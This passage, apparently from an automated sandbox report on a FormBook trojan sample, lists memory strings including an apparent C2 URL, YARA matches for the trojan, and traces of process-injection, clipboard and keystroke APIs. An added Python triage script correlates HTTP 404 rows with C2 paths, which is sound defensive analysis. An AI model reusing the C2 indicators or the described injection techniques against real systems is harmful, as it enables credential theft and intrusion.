            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033S
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4506373948.00000000028BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2369285902.000000000789E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4508760294.0000000004BDA000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.000000000432A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?Ubhdm=mxnR
            Source: netbtugc.exe, 00000004.00000003.2372596160.0000000007968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.4510433647.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4508760294.000000000426E000.00000004.10000000.00040000.00000000.sdmp, gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.00000000039BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4507909264.00000000039BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
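            The 404 rows above and the URL strings recovered from memory share one path: the Apache host echoes /fo8o/ in its error body, and the same directory appears in the C2 URL found in gaJjobDqjDYWsfRWPZSKY.exe memory, which is what ties a run of otherwise unremarkable 404s from several hosts (nginx, Microsoft-HTTPAPI, Apache) to the implant's beaconing rather than to browsing. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample. It parses one "HTTP traffic detected" row exactly as the report renders it (header names run together without separators, body as space-separated hex), checks that the declared Content-Length matches the captured body, cross-checks the Data Raw and Data Ascii columns against each other, pulls the path an Apache-style 404 echoes, and correlates it with URL strings from memory. The row and the URL are copied from the report above; the C2 path heuristic (a short alphanumeric directory combined with a single query key) is an assumption drawn from this one sample's URL, not a FormBook specification.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Joe Sandbox renders a response as one run-together string; these are the
# header names it emits, used as split points for the field regex below.
_FIELDS = ("Date", "Server", "Content-Length", "Connection", "Content-Type",
           "Data Raw", "Data Ascii")
_NAMES = "|".join(re.escape(f) for f in _FIELDS)
_STATUS_RE = re.compile(rf"HTTP/\d\.\d (?P<status>\d{{3}}) (?P<reason>.*?)(?=(?:{_NAMES}): )")
_FIELD_RE = re.compile(rf"(?P<name>{_NAMES}): (?P<value>.*?)(?=(?:{_NAMES}): |$)", re.S)
_APACHE_PATH_RE = re.compile(rb"The requested URL (\S+) was not found")
# Assumed shape of the C2 path seen in this sample (/fo8o/): a short
# alphanumeric directory; the URL must also carry exactly one query key.
_C2_PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")

# Constructed sample input, copied from the report rows above: the Apache 404
# (Data Raw hex verbatim, wrapped here per HTML line) and the URL string found
# in gaJjobDqjDYWsfRWPZSKY.exe memory.
APACHE_404 = (
    "HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:02:02 GMTServer: Apache"
    "Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1"
    "Data Raw: "
    "3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f "
    "49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a "
    "3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a "
    "3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a "
    "3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a "
    "3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a "
    "3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 "
    "77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e "
    "3c 2f 70 3e 0a "
    "3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a "
    'Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head>'
    "<title>404 Not Found</title></head><body><h1>Not Found</h1>"
    "<p>The requested URL /fo8o/ was not found on this server.</p></body></html>"
)
MEMORY_URL = "https://www.empowermedeco.com/fo8o/?Ubhdm=mxnR"


def parse_entry(row: str) -> dict:
    """Split one 'HTTP traffic detected' row into status, headers and body bytes."""
    start = row.find("HTTP/")
    if start < 0:
        raise ValueError("row does not contain an HTTP status line")
    row = row[start:]
    status = _STATUS_RE.match(row)
    if not status:
        raise ValueError("unrecognised status line")
    fields = {m.group("name"): m.group("value").strip()
              for m in _FIELD_RE.finditer(row, status.end())}
    return {
        "status": int(status.group("status")),
        "reason": status.group("reason"),
        "headers": {k: v for k, v in fields.items() if not k.startswith("Data ")},
        "body": bytes.fromhex(fields.get("Data Raw", "")),
        "ascii": fields.get("Data Ascii", ""),
    }


def length_mismatch(parsed: dict):
    """(declared, actual) when Content-Length disagrees with the captured body, else None."""
    declared = int(parsed["headers"].get("Content-Length", "-1"))
    actual = len(parsed["body"])
    return None if declared == actual else (declared, actual)


def ascii_matches(parsed: dict) -> bool:
    """Cross-check the two renderings: Data Ascii is the body with line breaks dropped."""
    flat = parsed["body"].decode("latin-1").replace("\r", "").replace("\n", "")
    return flat == parsed["ascii"]


def echoed_path(parsed: dict):
    """Path an Apache-style 404 body echoes back; nginx and HTTP.sys bodies carry none."""
    m = _APACHE_PATH_RE.search(parsed["body"])
    return m.group(1).decode("latin-1") if m else None


def c2_path_from_memory_string(url: str):
    """Return the path if the URL has the shape assumed above, else None."""
    parts = urlsplit(url)
    if _C2_PATH_RE.match(parts.path) and len(parse_qs(parts.query)) == 1:
        return parts.path
    return None


def correlate(rows, memory_urls):
    """Map each candidate C2 path from memory to the Server values of 404 rows echoing it."""
    hits = {}
    for url in memory_urls:
        path = c2_path_from_memory_string(url)
        if path:
            hits.setdefault(path, [])
    for row in rows:
        parsed = parse_entry(row)
        path = echoed_path(parsed)
        if path in hits:
            hits[path].append(parsed["headers"].get("Server", "?"))
    return hits


if __name__ == "__main__":
    parsed = parse_entry(APACHE_404)
    print(parsed["status"], parsed["headers"], length_mismatch(parsed), ascii_matches(parsed))
    print(correlate([APACHE_404], [MEMORY_URL]))
```

            Feed every "HTTP traffic detected" row of a report into correlate() together with the URL strings from the memory dumps; a path that shows up both in memory and in 404 bodies from unrelated Server banners is the decoy-domain pattern, and a Content-Length that disagrees with the captured body flags a truncated capture before any body-based conclusion is drawn.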
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C8EAFF
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C8ED6A
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C8EAFF
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00C7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00C7AA57
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exeCode function: 0_2_00CA9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CA9576

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4506129755.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4507614075.0000000002C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2187412228.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4509692516.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4507710541.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2187102525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2187890119.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4507743693.0000000002BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: BP-50C26_20241220_082241.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: BP-50C26_20241220_082241.exe, 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4eb160fc-4
            Source: BP-50C26_20241220_082241.exe, 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5640d895-3
            Source: BP-50C26_20241220_082241.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_55e43dfc-7
            Source: BP-50C26_20241220_082241.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7a47b206-e
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572B60 NtClose,LdrInitializeThunk,2_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,2_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03574340 NtSetContextThread,2_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03574650 NtSuspendThread,2_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572BF0 NtAllocateVirtualMemory,2_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572BE0 NtQueryValueKey,2_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572B80 NtQueryInformationFile,2_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572BA0 NtEnumerateValueKey,2_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572AD0 NtReadFile,2_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572AF0 NtWriteFile,2_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572AB0 NtWaitForSingleObject,2_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572F60 NtCreateProcessEx,2_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572F30 NtCreateSection,2_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572FE0 NtCreateFile,2_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572F90 NtProtectVirtualMemory,2_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572FB0 NtResumeThread,2_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572FA0 NtQuerySection,2_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572E30 NtWriteVirtualMemory,2_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572EE0 NtQueueApcThread,2_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572E80 NtReadVirtualMemory,2_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572EA0 NtAdjustPrivilegesToken,2_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572D10 NtMapViewOfSection,2_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572D00 NtSetInformationFile,2_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572D30 NtUnmapViewOfSection,2_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572DD0 NtDelayExecution,2_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572DB0 NtEnumerateKey,2_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572C60 NtCreateKey,2_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572C00 NtQueryInformationProcess,2_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572CC0 NtQueryVirtualMemory,2_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572CF0 NtOpenProcess,2_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572CA0 NtQueryInformationToken,2_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03573010 NtOpenDirectoryObject,2_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03573090 NtSetValueKey,2_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035739B0 NtGetContextThread,2_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03573D70 NtOpenThread,2_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03573D10 NtOpenProcessToken,2_2_03573D10
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F4340 NtSetContextThread,LdrInitializeThunk,4_2_030F4340
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F4650 NtSuspendThread,LdrInitializeThunk,4_2_030F4650
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2B60 NtClose,LdrInitializeThunk,4_2_030F2B60
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_030F2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_030F2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_030F2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2AD0 NtReadFile,LdrInitializeThunk,4_2_030F2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2AF0 NtWriteFile,LdrInitializeThunk,4_2_030F2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2F30 NtCreateSection,LdrInitializeThunk,4_2_030F2F30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2FB0 NtResumeThread,LdrInitializeThunk,4_2_030F2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2FE0 NtCreateFile,LdrInitializeThunk,4_2_030F2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_030F2E80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_030F2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_030F2D10
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_030F2D30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2DD0 NtDelayExecution,LdrInitializeThunk,4_2_030F2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_030F2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2C60 NtCreateKey,LdrInitializeThunk,4_2_030F2C60
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_030F2C70
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_030F2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F35C0 NtCreateMutant,LdrInitializeThunk,4_2_030F35C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F39B0 NtGetContextThread,LdrInitializeThunk,4_2_030F39B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2B80 NtQueryInformationFile,4_2_030F2B80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2AB0 NtWaitForSingleObject,4_2_030F2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2F60 NtCreateProcessEx,4_2_030F2F60
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2F90 NtProtectVirtualMemory,4_2_030F2F90
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2FA0 NtQuerySection,4_2_030F2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2E30 NtWriteVirtualMemory,4_2_030F2E30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2EA0 NtAdjustPrivilegesToken,4_2_030F2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2D00 NtSetInformationFile,4_2_030F2D00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2DB0 NtEnumerateKey,4_2_030F2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2C00 NtQueryInformationProcess,4_2_030F2C00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2CC0 NtQueryVirtualMemory,4_2_030F2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F2CF0 NtOpenProcess,4_2_030F2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F3010 NtOpenDirectoryObject,4_2_030F3010
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F3090 NtSetValueKey,4_2_030F3090
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F3D10 NtOpenProcessToken,4_2_030F3D10
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_030F3D70 NtOpenThread,4_2_030F3D70
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02827A70 NtReadFile,4_2_02827A70
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02827BE0 NtClose,4_2_02827BE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02827B50 NtDeleteFile,4_2_02827B50
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02827920 NtCreateFile,4_2_02827920
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02827D30 NtAllocateVirtualMemory,4_2_02827D30
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C7D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00C7D5EB
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C71201
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe Code function: 0_2_00C7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C7E8F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_028130F04_2_028130F0
